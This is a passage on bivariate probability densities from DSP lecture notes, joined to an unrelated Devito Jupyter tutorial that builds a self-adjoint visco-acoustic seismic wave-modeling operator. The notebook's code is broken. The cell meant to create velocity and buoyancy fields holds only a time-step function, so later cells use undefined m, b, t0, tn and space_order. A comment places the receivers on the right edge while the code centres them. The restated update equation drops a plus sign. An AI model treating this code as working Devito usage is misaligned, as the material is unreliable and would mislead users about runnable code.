### Bivariate Probability Density Function The bivariate or joint PDF $p_{xy}(\theta_x, \theta_y, k_x, k_y)$ of two continuous-amplitude real-valued random signals $x[k]$ and $y[k]$ is defined as \begin{equation} p_{xy}(\theta_x, \theta_y, k_x, k_y) := \frac{\partial^2}{\partial \theta_x \partial \theta_y} P_{xy}(\theta_x, \theta_y, k_x, k_y) \end{equation} The bivariate PDF quantifies the joint probability that $x[k]$ takes the value $\theta_x$ and that $y[k]$ takes the value $\theta_y$ for the entire ensemble of sample functions. If $x[k] = y[k]$ the bivariate PDF $p_{xx}(\theta_1, \theta_2, k_1, k_2)$ describes the probability that the random signal $x[k]$ takes the value $\theta_1$ at time instance $k_1$ and the value $\theta_2$ at time instance $k_2$. Hence, $p_{xx}(\theta_1, \theta_2, k_1, k_2)$ provides insights into the temporal dependencies of a random signal $x[k]$. This notebook is provided as [Open Educational Resource](https://en.wikipedia.org/wiki/Open_educational_resources). Feel free to use the notebook for your own purposes. The text is licensed under [Creative Commons Attribution 4.0](https://creativecommons.org/licenses/by/4.0/), the code of the IPython examples under the [MIT license](https://opensource.org/licenses/MIT). Please attribute the work as follows: *Sascha Spors, Digital Signal Processing - Lecture notes featuring computational examples, 2016*.
github_jupyter
# Implementation of a Devito self adjoint variable density visco- acoustic isotropic modeling operator <br>-- Nonlinear Ops -- ## This operator is contributed by Chevron Energy Technology Company (2020) This operator is based on simplifications of the systems presented in: <br>**Self-adjoint, energy-conserving second-order pseudoacoustic systems for VTI and TTI media for reverse time migration and full-waveform inversion** (2016) <br>Kenneth Bube, John Washbourne, Raymond Ergas, and Tamas Nemeth <br>SEG Technical Program Expanded Abstracts <br>https://library.seg.org/doi/10.1190/segam2016-13878451.1 ## Introduction The goal of this tutorial set is to generate and prove correctness of modeling and inversion capability in Devito for variable density visco- acoustics using an energy conserving form of the wave equation. We describe how the linearization of the energy conserving *self adjoint* system with respect to modeling parameters allows using the same modeling system for all nonlinear and linearized forward and adjoint finite difference evolutions. There are three notebooks in this series: ##### 1. Implementation of a Devito self adjoint variable density visco- acoustic isotropic modeling operator -- Nonlinear Ops - Implement the nonlinear modeling operations. - [sa_01_iso_implementation1.ipynb](sa_01_iso_implementation1.ipynb) ##### 2. Implementation of a Devito self adjoint variable density visco- acoustic isotropic modeling operator -- Linearized Ops - Implement the linearized (Jacobian) ```forward``` and ```adjoint``` modeling operations. - [sa_02_iso_implementation2.ipynb](sa_02_iso_implementation2.ipynb) ##### 3. Implementation of a Devito self adjoint variable density visco- acoustic isotropic modeling operator -- Correctness Testing - Tests the correctness of the implemented operators. 
- [sa_03_iso_correctness.ipynb](sa_03_iso_correctness.ipynb) There are similar series of notebooks implementing and testing operators for VTI and TTI anisotropy ([README.md](README.md)). Below we introduce the *self adjoint* form of the scalar isotropic variable density visco- acoustic wave equation with a simple form of dissipation only Q attenuation. This dissipation only (no dispersion) attenuation term $\left (\frac{\displaystyle \omega}{Q}\ \partial_t\ u \right)$ is an approximation of a [Maxwell Body](https://en.wikipedia.org/wiki/Maxwell_material) -- that is to say viscoelasticity approximated with a spring and dashpot in series. In practice this approach for attenuating outgoing waves is very similar to the Cerjan style damping in absorbing boundaries used elsewhere in Devito ([References](#nl_refs)). The derivation of the attenuation model is not in scope for this tutorial, but one important point is that the physics in the absorbing boundary region and the interior of the model are *unified*, allowing the same modeling equations to be used everywhere, with physical Q values in the interior tapering to non-physical small Q at the boundaries to attenuate outgoing waves. ## Outline 1. Define symbols 2. Introduce the SA wave equation 3. Show generation of skew symmetric derivatives and prove correctness with unit test 4. Derive the time update equation used to implement the nonlinear forward modeling operator 5. Create the Devito grid and model fields 6. Define a function to implement the attenuation profile ($\omega\ /\ Q$) 7. Create the Devito operator 8. Run the Devito operator 9. Plot the resulting wavefields 10. 
References ## Table of symbols | Symbol &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; | Description | Dimensionality | | :--- | :--- | :--- | | $\omega_c = 2 \pi f_c$ | center angular frequency | constant | | $m(x,y,z)$ | P wave velocity | function of space | | $b(x,y,z)$ | buoyancy $(1 / \rho)$ | function of space | | $Q(x,y,z)$ | Attenuation at frequency $\omega_c$ | function of space | | $u(t,x,y,z)$ | Pressure wavefield | function of time and space | | $q(t,x,y,z)$ | Source term | function of time, localized in space | | $\overleftarrow{\partial_t}$ | shifted first derivative wrt $t$ | shifted 1/2 sample backward in time | | $\partial_{tt}$ | centered second derivative wrt $t$ | centered in time | | $\overrightarrow{\partial_x},\ \overrightarrow{\partial_y},\ \overrightarrow{\partial_z}$ | + shifted first derivative wrt $x,y,z$ | shifted 1/2 sample forward in space | | $\overleftarrow{\partial_x},\ \overleftarrow{\partial_y},\ \overleftarrow{\partial_z}$ | - shifted first derivative wrt $x,y,z$ | shifted 1/2 sample backward in space | | $\Delta_t, \Delta_x, \Delta_y, \Delta_z$ | sampling rates for $t, x, y , z$ | $t, x, y , z$ | ## A word about notation We use the arrow symbols over derivatives $\overrightarrow{\partial_x}$ as a shorthand notation to indicate that the derivative is taken at a shifted location. For example: - $\overrightarrow{\partial_x}\ u(t,x,y,z)$ indicates that the $x$ derivative of $u(t,x,y,z)$ is taken at $u(t,x+\frac{\Delta x}{2},y,z)$. - $\overleftarrow{\partial_z}\ u(t,x,y,z)$ indicates that the $z$ derivative of $u(t,x,y,z)$ is taken at $u(t,x,y,z-\frac{\Delta z}{2})$. - $\overleftarrow{\partial_t}\ u(t,x,y,z)$ indicates that the $t$ derivative of $u(t,x,y,z)$ is taken at $u(t-\frac{\Delta_t}{2},x,y,z)$. We usually drop the $(t,x,y,z)$ notation from wavefield variables unless required for clarity of exposition, so that $u(t,x,y,z)$ becomes $u$. 
## Self adjoint variable density visco- acoustic wave equation Our self adjoint wave equation is written: $$ \frac{b}{m^2} \left( \frac{\omega_c}{Q} \overleftarrow{\partial_t}\ u + \partial_{tt}\ u \right) = \overleftarrow{\partial_x}\left(b\ \overrightarrow{\partial_x}\ u \right) + \overleftarrow{\partial_y}\left(b\ \overrightarrow{\partial_y}\ u \right) + \overleftarrow{\partial_z}\left(b\ \overrightarrow{\partial_z}\ u \right) + q $$ An advantage of this form is that the same system can be used to provide *stable modes of propagation* for all operations needed in quasi- Newton optimization: - the nonlinear forward - the linearized forward (Jacobian forward) - the linearized adjoint (Jacobian adjoint) This advantage is more important for anisotropic operators, where widely utilized non energy conserving formulations can provide unstable adjoints and thus unstable gradients for anisotropy parameters. The *self adjoint* formulation is evident in the shifted spatial derivatives, with the derivative on the right side $\overrightarrow{\partial}$ shifting forward in space one-half cell, and the derivative on the left side $\overleftarrow{\partial}$ shifting backward in space one-half cell. $\overrightarrow{\partial}$ and $\overleftarrow{\partial}$ are anti-symmetric (also known as skew symmetric), meaning that for two random vectors $x_1$ and $x_2$, correctly implemented numerical derivatives will have the following property: $$ x_2 \cdot \left( \overrightarrow{\partial_x}\ x_1 \right) \approx -\ x_1 \cdot \left( \overleftarrow{\partial_x}\ x_2 \right) $$ Below we will demonstrate this skew symmetry with a simple unit test on Devito generated derivatives. In the following notebooks in this series, material parameters *sandwiched* between the derivatives -- including anisotropy parameters -- become much more interesting, but here buoyancy $b$ is the only material parameter between derivatives in our self adjoint (SA) wave equation. 
## Imports We have grouped all imports used in this notebook here for consistency. ``` import numpy as np from examples.seismic import RickerSource, Receiver, TimeAxis from devito import (Grid, Function, TimeFunction, SpaceDimension, Constant, Eq, Operator, solve, configuration, norm) from devito.finite_differences import Derivative from devito.builtins import gaussian_smooth from examples.seismic.self_adjoint import setup_w_over_q import matplotlib as mpl import matplotlib.pyplot as plt from matplotlib import cm from timeit import default_timer as timer # These lines force images to be displayed in the notebook, and scale up fonts %matplotlib inline mpl.rc('font', size=14) # Make white background for plots, not transparent plt.rcParams['figure.facecolor'] = 'white' # Set logging to debug, captures statistics on the performance of operators configuration['log-level'] = 'DEBUG' ``` ## Unit test demonstrating skew symmetry for shifted derivatives As noted above, we prove with a small 1D unit test and 8th order spatial operator that the Devito shifted first derivatives are skew symmetric. This anti-symmetry can be demonstrated for the forward and backward half cell shift first derivative operators $\overrightarrow{\partial}$ and $\overleftarrow{\partial}$ with two random vectors $x_1$ and $x_2$ by verifying the *dot product test* as written above. We will use Devito to implement the following two equations with an ```Operator```: $$ \begin{aligned} f_2 = \overrightarrow{\partial_x}\ f_1 \\[5pt] g_2 = \overleftarrow{\partial_x}\ g_1 \end{aligned} $$ And then verify the dot products are equivalent. 
Recall that skew symmetry introduces a minus sign in this equality: $$ f_1 \cdot g_2 \approx - g_1 \cdot f_2 $$ We use the following test for relative error (note the flipped signs in numerator and denominator due to anti- symmetry): $$ \frac{\displaystyle f_1 \cdot g_2 + g_1 \cdot f_2} {\displaystyle f_1 \cdot g_2 - g_1 \cdot f_2}\ <\ \epsilon $$ ``` # NBVAL_IGNORE_OUTPUT # Make 1D grid to test derivatives n = 101 d = 1.0 shape = (n, ) spacing = (1 / (n-1), ) origin = (0., ) extent = (d * (n-1), ) dtype = np.float64 # Initialize Devito grid and Functions for input(f1,g1) and output(f2,g2) # Note that space_order=8 allows us to use an 8th order finite difference # operator by properly setting up grid accesses with halo cells grid1d = Grid(shape=shape, extent=extent, origin=origin, dtype=dtype) x = grid1d.dimensions[0] f1 = Function(name='f1', grid=grid1d, space_order=8) f2 = Function(name='f2', grid=grid1d, space_order=8) g1 = Function(name='g1', grid=grid1d, space_order=8) g2 = Function(name='g2', grid=grid1d, space_order=8) # Fill f1 and g1 with random values in [-1,+1] f1.data[:] = -1 + 2 * np.random.rand(n,) g1.data[:] = -1 + 2 * np.random.rand(n,) # Equation defining: [f2 = forward 1/2 cell shift derivative applied to f1] equation_f2 = Eq(f2, f1.dx(x0=x+0.5*x.spacing)) # Equation defining: [g2 = backward 1/2 cell shift derivative applied to g1] equation_g2 = Eq(g2, g1.dx(x0=x-0.5*x.spacing)) # Define an Operator to implement these equations and execute op = Operator([equation_f2, equation_g2]) op() # Compute the dot products and the relative error f1g2 = np.dot(f1.data, g2.data) g1f2 = np.dot(g1.data, f2.data) diff = (f1g2+g1f2)/(f1g2-g1f2) tol = 100 * np.finfo(dtype).eps print("f1g2, g1f2, diff, tol; %+.6e %+.6e %+.6e %+.6e" % (f1g2, g1f2, diff, tol)) # At last the unit test # Assert these dot products are float epsilon close in relative error assert diff < 100 * np.finfo(dtype).eps ``` ## Show the finite difference operators and generated code You can 
inspect the finite difference coefficients and locations for evaluation with the code shown below. For your reference, the finite difference coefficients seen in the first two stanzas below are exactly the coefficients generated in Table 2 of Fornberg's paper **Generation of Finite Difference Formulas on Arbitrarily Spaced Grids** linked below ([References](#nl_refs)). Note that you don't need to inspect the generated code, but this does provide the option to use this highly optimized code in applications that do not need or require python. If you inspect the code you will notice hallmarks of highly optimized c code, including ```pragmas``` for vectorization, and ```decorations``` for pointer restriction and alignment. ``` # NBVAL_IGNORE_OUTPUT # Show the FD coefficients generated by Devito # for the forward 1/2 cell shifted first derivative operator print("\n\nForward +1/2 cell shift;") print("..................................") print(f1.dx(x0=x+0.5*x.spacing).evaluate) # Show the FD coefficients generated by Devito # for the backward 1/2 cell shifted first derivative operator print("\n\nBackward -1/2 cell shift;") print("..................................") print(f1.dx(x0=x-0.5*x.spacing).evaluate) # Show code generated by Devito for applying the derivatives print("\n\nGenerated c code;") print("..................................") print(op.ccode) ``` ## Doing some algebra to solve for the time update The next step in implementing our Devito modeling operator is to define the equation used to update the pressure wavefield as a function of time. What follows is a bit of algebra using the wave equation and finite difference approximations to time derivatives to express the pressure wavefield forward in time $u(t+\Delta_t)$ as a function of the current $u(t)$ and previous $u(t-\Delta_t)$ pressure wavefields. #### 1. 
Numerical approximation for $\partial_{tt}\ u$, solved for for $u(t+\Delta_t)$ The second order accurate centered approximation to the second time derivative involves three wavefields: $u(t-\Delta_t)$, $u(t)$, and $u(t+\Delta_t)$. In order to advance our finite difference solution in time, we solve for $u(t+\Delta_t)$. $$ \begin{aligned} \partial_{tt}\ u &= \frac{\displaystyle u(t+\Delta_t) - 2\ u(t) + u(t-\Delta_t)}{\displaystyle \Delta_t^2} \\[5pt] u(t+\Delta_t)\ &= \Delta_t^2\ \partial_{tt}\ u + 2\ u(t) - u(t-\Delta_t) \end{aligned} $$ #### 2. Numerical approximation for $\overleftarrow{\partial_{t}}\ u$ The argument for using a backward approximation is a bit hand wavy, but goes like this: a centered or forward approximation for $\partial_{t}\ u$ would involve the term $u(t+\Delta_t)$, and hence $u(t+\Delta_t)$ would appear at two places in our time update equation below, essentially making the form implicit (although it would be easy to solve for $u(t+\Delta_t)$). We are interested in explicit time stepping and the correct behavior of the attenuation term, and so prefer the backward approximation for $\overleftarrow{\partial_{t}}\ u$. Our experience is that the use of the backward difference is more stable than forward or centered. The first order accurate backward approximation to the first time derivative involves two wavefields: $u(t-\Delta_t)$, and $u(t)$. We can use this expression as is. $$ \overleftarrow{\partial_{t}}\ u = \frac{\displaystyle u(t) - u(t-\Delta_t)}{\displaystyle \Delta_t} $$ #### 3. 
Solve the wave equation for $\partial_{tt}$ $$ \begin{aligned} \frac{b}{m^2} \left( \frac{\omega_c}{Q} \overleftarrow{\partial_{t}}\ u + \partial_{tt}\ u \right) &= \overleftarrow{\partial_x}\left(b\ \overrightarrow{\partial_x}\ u \right) + \overleftarrow{\partial_y}\left(b\ \overrightarrow{\partial_y}\ u \right) + \overleftarrow{\partial_z}\left(b\ \overrightarrow{\partial_z}\ u \right) + q\\[10pt] \partial_{tt}\ u &= \frac{m^2}{b} \left[ \overleftarrow{\partial_x}\left(b\ \overrightarrow{\partial_x}\ u \right) + \overleftarrow{\partial_y}\left(b\ \overrightarrow{\partial_y}\ u \right) + \overleftarrow{\partial_z}\left(b\ \overrightarrow{\partial_z}\ u \right) + q \right] - \frac{\omega_c}{Q} \overleftarrow{\partial_{t}}\ u \end{aligned} $$ #### 4. Plug in $\overleftarrow{\partial_t} u$ and $\partial_{tt} u$ into the time update equation Next we plug in the right hand sides for $\partial_{tt}\ u$ and $\overleftarrow{\partial_{t}}\ u$ into the time update expression for $u(t+\Delta_t)$ from step 2. $$ \begin{aligned} u(t+\Delta_t) &= \Delta_t^2 \frac{m^2}{b} \left[ \overleftarrow{\partial_x}\left(b\ \overrightarrow{\partial_x}\ u \right) + \overleftarrow{\partial_y}\left(b\ \overrightarrow{\partial_y}\ u \right) + \overleftarrow{\partial_z}\left(b\ \overrightarrow{\partial_z}\ u \right) + q \right] \\[10pt] & \quad -\ \Delta_t^2 \frac{\omega_c}{Q} \left( \frac{\displaystyle u(t) - u(t-\Delta_t)} {\displaystyle \Delta_t} \right) + 2\ u(t) - u(t-\Delta_t) \end{aligned} $$ #### 5. Simplify ... $$ \begin{aligned} u(t+\Delta_t) &= \Delta_t^2 \frac{m^2}{b} \left[ \overleftarrow{\partial_x}\left(b\ \overrightarrow{\partial_x}\ u \right) + \overleftarrow{\partial_y}\left(b\ \overrightarrow{\partial_y}\ u \right) + \overleftarrow{\partial_z}\left(b\ \overrightarrow{\partial_z}\ u \right) + q \right] \\[10pt] & \quad +\ \left(2 -\ \Delta_t\ \frac{\omega_c}{Q} \right) u(t) + \left(\Delta_t\ \frac{\omega_c}{Q} - 1 \right) u(t-\Delta_t) \end{aligned} $$ #### 6. et voila ... 
The last equation is how we update the pressure wavefield at each time step, and depends on $u(t)$ and $u(t-\Delta_t)$. The main work of the finite difference explicit time stepping is evaluating the nested spatial derivative operators on the RHS of this equation. The particular advantage of Devito symbolic optimization is that Devito is able to solve for the complicated expressions that result from substituting the discrete forms of high order numerical finite difference approximations for these nested spatial derivatives. We have now completed the maths required to implement the modeling operator. The remainder of this notebook deals with setting up and using the required Devito objects. ## Instantiate the Devito grid for a two dimensional problem Define the dimensions and coordinates for the model. The computational domain of the model is surrounded by an *absorbing boundary region* where we implement boundary conditions to eliminate outgoing waves. We define the sizes for the interior of the model ```nx``` and ```nz```, the width of the absorbing boundary region ```npad```, and the sizes for the entire model padded with absorbing boundaries become ```nxpad = nx + 2*npad``` and ```nzpad = nz + 2*npad```. ``` # Define dimensions for the interior of the model nx,nz = 751,751 dx,dz = 10.0,10.0 # Grid spacing in m shape = (nx, nz) # Number of grid points spacing = (dx, dz) # Domain size is now 5 km by 5 km origin = (0., 0.) # Origin of coordinate system, specified in m. 
extent = tuple([s*(n-1) for s, n in zip(spacing, shape)]) # Define dimensions for the model padded with absorbing boundaries npad = 50 # number of points in absorbing boundary region (all sides) nxpad,nzpad = nx+2*npad, nz+2*npad shape_pad = np.array(shape) + 2 * npad origin_pad = tuple([o - s*npad for o, s in zip(origin, spacing)]) extent_pad = tuple([s*(n-1) for s, n in zip(spacing, shape_pad)]) # Define the dimensions # Note if you do not specify dimensions, you get in order x,y,z x = SpaceDimension(name='x', spacing=Constant(name='h_x', value=extent_pad[0]/(shape_pad[0]-1))) z = SpaceDimension(name='z', spacing=Constant(name='h_z', value=extent_pad[1]/(shape_pad[1]-1))) # Initialize the Devito grid grid = Grid(extent=extent_pad, shape=shape_pad, origin=origin_pad, dimensions=(x, z), dtype=dtype) print("shape; ", shape) print("origin; ", origin) print("spacing; ", spacing) print("extent; ", extent) print("") print("shape_pad; ", shape_pad) print("origin_pad; ", origin_pad) print("extent_pad; ", extent_pad) print("") print("grid.shape; ", grid.shape) print("grid.extent; ", grid.extent) print("grid.spacing_map;", grid.spacing_map) ``` ## Define velocity and buoyancy model parameters We have the following constants and fields from our self adjoint wave equation that we define as time invariant using ```Functions```: | &nbsp; Symbol &nbsp; | Description | | :---: | :--- | | $$m(x,z)$$ | Acoustic velocity | | $$b(x,z)=\frac{1}{\rho(x,z)}$$ | Buoyancy (reciprocal density) | ``` # Create the velocity and buoyancy fields. 
def compute_critical_dt(v):
    """
    Return the temporal sampling interval that satisfies CFL stability.

    Replicates the functionality in the Model class. A safety factor of
    0.75 shrinks dt to account for the w/Q attenuation term, and the
    result is rounded through a "%.5e" string for reproducible output.

    Parameters
    ----------
    v : Function
        Velocity field; its grid supplies the spatial sampling.

    Returns
    -------
    scalar (same dtype as the velocity)
        The stable time step.
    """
    # CFL coefficient depends on dimensionality (3D is stricter than 2D)
    is_3d = len(v.grid.shape) == 3
    cfl_coeff = 0.38 if is_3d else 0.42
    raw_dt = v.dtype(cfl_coeff * np.min(v.grid.spacing) / np.max(v.data))
    safe_dt = 0.75 * raw_dt
    return v.dtype("%.5e" % safe_dt)
# Simulation time end (1 second = 1000 msec) dt = compute_critical_dt(m) time_range = TimeAxis(start=t0, stop=tn, step=dt) print("Time min, max, dt, num; %10.6f %10.6f %10.6f %d" % (t0, tn, dt, int(tn//dt) + 1)) print("time_range; ", time_range) ``` ## Define the acquisition geometry: locations of sources and receivers **source**: - X coordinate: center of the model: dx*(nx//2) - Z coordinate: center of the model: dz*(nz//2) - We use a 10 Hz center frequency [RickerSource](https://github.com/devitocodes/devito/blob/master/examples/seismic/source.py#L280) wavelet as defined in ```examples/seismic/source.py``` **receivers**: - X coordinate: center of the model: dx*(nx//2) - Z coordinate: vertical line from top to bottom of model - We use a vertical line of [Receivers](https://github.com/devitocodes/devito/blob/master/examples/seismic/source.py#L80) as defined with a ```PointSource``` in ```examples/seismic/source.py``` ``` # NBVAL_IGNORE_OUTPUT # Source in the center of the model at 10 Hz center frequency fpeak = 0.010 src = RickerSource(name='src', grid=grid, f0=fpeak, npoint=1, time_range=time_range) src.coordinates.data[0,0] = dx * (nx//2) src.coordinates.data[0,1] = dz * (nz//2) # line of receivers along the right edge of the model rec = Receiver(name='rec', grid=grid, npoint=nz, time_range=time_range) rec.coordinates.data[:,0] = dx * (nx//2) rec.coordinates.data[:,1] = np.linspace(0.0, dz*(nz-1), nz) print("src_coordinate X; %+12.4f" % (src.coordinates.data[0,0])) print("src_coordinate Z; %+12.4f" % (src.coordinates.data[0,1])) print("rec_coordinates X min/max; %+12.4f %+12.4f" % \ (np.min(rec.coordinates.data[:,0]), np.max(rec.coordinates.data[:,0]))) print("rec_coordinates Z min/max; %+12.4f %+12.4f" % \ (np.min(rec.coordinates.data[:,1]), np.max(rec.coordinates.data[:,1]))) # We can plot the time signature to see the wavelet src.show() ``` ## Plot velocity and density models Next we plot the velocity and density models for illustration. 
- The demarcation between interior and absorbing boundary is shown with a dotted white line - The source is shown as a large red asterisk - The extent of the receiver array is shown with a thick black line ``` # note: flip sense of second dimension to make the plot positive downwards plt_extent = [origin_pad[0], origin_pad[0] + extent_pad[0], origin_pad[1] + extent_pad[1], origin_pad[1]] vmin, vmax = 1.4, 1.7 dmin, dmax = 0.9, 1.1 plt.figure(figsize=(12,8)) plt.subplot(1, 2, 1) plt.imshow(np.transpose(m.data), cmap=cm.jet, vmin=vmin, vmax=vmax, extent=plt_extent) plt.colorbar(orientation='horizontal', label='Velocity (m/msec)') plt.plot([origin[0], origin[0], extent[0], extent[0], origin[0]], [origin[1], extent[1], extent[1], origin[1], origin[1]], 'white', linewidth=4, linestyle=':', label="Absorbing Boundary") plt.plot(rec.coordinates.data[:, 0], rec.coordinates.data[:, 1], \ 'black', linestyle='-', label="Receiver") plt.plot(src.coordinates.data[:, 0], src.coordinates.data[:, 1], \ 'red', linestyle='None', marker='*', markersize=15, label="Source") plt.xlabel("X Coordinate (m)") plt.ylabel("Z Coordinate (m)") plt.title("Velocity w/ absorbing boundary") plt.subplot(1, 2, 2) plt.imshow(np.transpose(1 / b.data), cmap=cm.jet, vmin=dmin, vmax=dmax, extent=plt_extent) plt.colorbar(orientation='horizontal', label='Density (m^3/kg)') plt.plot([origin[0], origin[0], extent[0], extent[0], origin[0]], [origin[1], extent[1], extent[1], origin[1], origin[1]], 'white', linewidth=4, linestyle=':', label="Absorbing Boundary") plt.plot(rec.coordinates.data[:, 0], rec.coordinates.data[:, 1], \ 'black', linestyle='-', label="Receiver") plt.plot(src.coordinates.data[:, 0], src.coordinates.data[:, 1], \ 'red', linestyle='None', marker='*', markersize=15, label="Source") plt.xlabel("X Coordinate (m)") plt.ylabel("Z Coordinate (m)") plt.title("Density w/ absorbing boundary") plt.tight_layout() None ``` ## Create and plot the $\frac{\omega_c}{Q}$ model used for dissipation only 
attenuation We have two remaining constants and fields from our SA wave equation that we need to define: | &nbsp; Symbol &nbsp; | Description | | :---: | :--- | | $$\omega_c = 2 \pi f_c$$ | Center angular frequency | | $$\frac{1}{Q(x,z)}$$ | Inverse Q model used in the modeling system | The absorbing boundary condition strategy we use is designed to eliminate any corners or edges in the attenuation profile. We do this by making Q a function of *distance from the nearest boundary*. We have implemented the function ```setup_w_over_q``` for 2D and 3D fields in the file ```utils.py```, and will use it below. In Devito these fields are type ```Function```, a concrete implementation of ```AbstractFunction```. Feel free to inspect the source at [utils.py](utils.py), which uses Devito's symbolic math to write a nonlinear equation describing the absorbing boundary for dispatch to automatic code generation. Note that we will generate two Q models, one with strong attenuation (a Q value of 25) and one with moderate attenuation (a Q value of 100) -- in order to demonstrate the impact of attenuation in the plots near the end of this notebook. 
``` # NBVAL_IGNORE_OUTPUT # Initialize the attenuation profile for Q=25 and Q=100 models w = 2.0 * np.pi * fpeak print("w,fpeak; ", w, fpeak) qmin = 0.1 wOverQ_025 = Function(name='wOverQ_025', grid=grid, space_order=space_order) wOverQ_100 = Function(name='wOverQ_100', grid=grid, space_order=space_order) setup_w_over_q(wOverQ_025, w, qmin, 25.0, npad) setup_w_over_q(wOverQ_100, w, qmin, 100.0, npad) # Plot the log of the generated Q profile q025 = np.log10(w / wOverQ_025.data) q100 = np.log10(w / wOverQ_100.data) lmin, lmax = np.log10(qmin), np.log10(100) plt.figure(figsize=(12,8)) plt.subplot(1, 2, 1) plt.imshow(np.transpose(q025.data), cmap=cm.jet, vmin=lmin, vmax=lmax, extent=plt_extent) plt.colorbar(orientation='horizontal', label='log10(Q)') plt.plot([origin[0], origin[0], extent[0], extent[0], origin[0]], [origin[1], extent[1], extent[1], origin[1], origin[1]], 'white', linewidth=4, linestyle=':', label="Absorbing Boundary") plt.plot([origin[0], origin[0], extent[0], extent[0], origin[0]], [origin[1], extent[1], extent[1], origin[1], origin[1]], 'white', linewidth=4, linestyle=':', label="Absorbing Boundary") plt.plot(rec.coordinates.data[:, 0], rec.coordinates.data[:, 1], \ 'black', linestyle='-', label="Receiver") plt.plot(src.coordinates.data[:, 0], src.coordinates.data[:, 1], \ 'red', linestyle='None', marker='*', markersize=15, label="Source") plt.xlabel("X Coordinate (m)") plt.ylabel("Z Coordinate (m)") plt.title("log10 of $Q=25$ model") plt.subplot(1, 2, 2) plt.imshow(np.transpose(q100.data), cmap=cm.jet, vmin=lmin, vmax=lmax, extent=plt_extent) plt.colorbar(orientation='horizontal', label='log10(Q)') plt.plot([origin[0], origin[0], extent[0], extent[0], origin[0]], [origin[1], extent[1], extent[1], origin[1], origin[1]], 'white', linewidth=4, linestyle=':', label="Absorbing Boundary") plt.plot([origin[0], origin[0], extent[0], extent[0], origin[0]], [origin[1], extent[1], extent[1], origin[1], origin[1]], 'white', linewidth=4, linestyle=':', 
label="Absorbing Boundary") plt.plot(rec.coordinates.data[:, 0], rec.coordinates.data[:, 1], \ 'black', linestyle='-', label="Receiver") plt.plot(src.coordinates.data[:, 0], src.coordinates.data[:, 1], \ 'red', linestyle='None', marker='*', markersize=15, label="Source") plt.xlabel("X Coordinate (m)") plt.ylabel("Z Coordinate (m)") plt.title("log10 of $Q=100$ model") plt.tight_layout() None ``` ## Define the pressure wavefield as a ```TimeFunction``` We specify the time_order as 2, which allocates 3 time steps in the pressure wavefield. As described elsewhere, Devito will use "cyclic indexing" to index into this multi-dimensional array, mneaning that via the *modulo operator*, the time indices $[0, 1, 2, 3, 4, 5, ...]$ are mapped into the modulo indices $[0, 1, 2, 0, 1, 2, ...]$ This [FAQ entry](https://github.com/devitocodes/devito/wiki/FAQ#as-time-increases-in-the-finite-difference-evolution-are-wavefield-arrays-swapped-as-you-might-see-in-cc-code) explains in more detail. ``` # Define the TimeFunction u = TimeFunction(name="u", grid=grid, time_order=2, space_order=space_order) # Get the symbols for dimensions for t, x, z # We need these below in order to write the source injection and the t,x,z = u.dimensions ``` ## Define the source injection and receiver extraction If you examine the equation for the time update we derived above you will see that the source $q$ is scaled by the term $(\Delta_t^2 m^2\ /\ b)$. You will see that scaling term in the source injection below. For $\Delta_t^2$ we use the time dimension spacing symbol ```t.spacing**2```. Note that source injection and receiver extraction are accomplished via linear interpolation, as implemented in ```SparseTimeFunction``` in [sparse.py](https://github.com/devitocodes/devito/blob/master/devito/types/sparse.py#L747). 
``` # Source injection, with appropriate scaling src_term = src.inject(field=u.forward, expr=src * t.spacing**2 * m**2 / b) # Receiver extraction rec_term = rec.interpolate(expr=u.forward) ``` ## Finally, the Devito operator We next transcribe the time update expression we derived above into a Devito ```Eq```. Then we add that expression with the source injection and receiver extraction and build an ```Operator``` that will generate the c code for performing the modeling. We copy the time update expression from above for clarity. Note we omit $q$ because we will be explicitly injecting the source using ```src_term``` defined immediately above. However, for the linearized *Born forward modeling* operation the $q$ term is an appropriately scaled field, as shown in the next notebook in this series. $$ \begin{aligned} u(t+\Delta_t) &= \Delta_t^2 \frac{m^2}{b} \left[ \overleftarrow{\partial_x}\left(b\ \overrightarrow{\partial_x}\ u \right) + \overleftarrow{\partial_y}\left(b\ \overrightarrow{\partial_y}\ u \right) + \overleftarrow{\partial_z}\left(b\ \overrightarrow{\partial_z}\ u \right) + q \right] \\[10pt] & \quad \left(2 -\ \Delta_t\ \frac{\omega_c}{Q} \right) u(t) + \left(\Delta_t\ \frac{\omega_c}{Q} - 1 \right) u(t-\Delta_t) \end{aligned} $$ ``` # NBVAL_IGNORE_OUTPUT # Generate the time update equation and operator for Q=25 model eq_time_update = (t.spacing**2 * m**2 / b) * \ ((b * u.dx(x0=x+x.spacing/2)).dx(x0=x-x.spacing/2) + \ (b * u.dz(x0=z+z.spacing/2)).dz(x0=z-z.spacing/2)) + \ (2 - t.spacing * wOverQ_025) * u + \ (t.spacing * wOverQ_025 - 1) * u.backward stencil = Eq(u.forward, eq_time_update) # Update the dimension spacing_map to include the time dimension # These symbols will be replaced with the relevant scalars by the Operator spacing_map = grid.spacing_map spacing_map.update({t.spacing : dt}) print("spacing_map; ", spacing_map) # op = Operator([stencil] + src_term + rec_term) op = Operator([stencil] + src_term + rec_term, subs=spacing_map) ``` ## 
Impact of hardwiring the grid spacing on operation count The argument ```subs=spacing_map``` passed to the operator substitutes values for the temporal and spatial dimensions into the expressions before code generation. This reduces the number of floating point operations executed by the kernel by pre-evaluating certain coefficients, and possibly absorbing the spacing scalars from the denominators of the numerical finite difference approximations into the finite difference coefficients. If you run the two cases of passing/not passing the ```subs=spacing_map``` argument by commenting/un-commenting the last two lines of the cell immediately above, you can inspect the difference in computed flop count for the operator. This is reported by setting Devito logging ```configuration['log-level'] = 'DEBUG'``` and is reported during Devito symbolic optimization with the output line ```Flops reduction after symbolic optimization```. Note also if you inspect the generated code for the two cases, you will see extra calling parameters are required for the case without the substitution. We have compiled the flop count for 2D and 3D operators into the table below. | Dimensionality | Passing subs | Flops reduction | Delta | |:---:|:---:|:---:|:---:| | 2D | False | 588 --> 81 | | | 2D | True | 300 --> 68 | 13.7% | | 3D | False | 875 --> 116 | | | 3D | True | 442 --> 95 | 18.1% | Note the gain in performance is around 14% for this example in 2D, and around 18% in 3D. ## Print the arguments to the Devito operator We use ```op.arguments()``` to print the arguments to the operator. As noted above depending on the use of ```subs=spacing_map``` you will see different arguments here. In the case of no ```subs=spacing_map``` argument to the operator, you will see arguments for the dimensional spacing constants as parameters to the operator, including ```h_x```, ```h_z```, and ```dt```. 
